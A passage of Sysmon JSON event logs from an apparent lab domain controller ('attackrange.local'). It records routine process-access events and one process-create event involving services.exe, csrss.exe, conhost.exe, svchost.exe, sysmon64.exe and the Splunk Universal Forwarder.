{A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.766","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.766\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.766","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.766\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.766","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.785\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-00109C670300}\r\nProcessId: 3808\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.785","ProcessGuid":"{A837DB8D-01C6-5F25-0000-00109C670300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1657,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-00109C670300}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-00109C670300}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7d48|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1658,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-00109C670300}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-00109C670300}","TargetProcessId":"3808","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1659,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1660,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1661,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1662,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 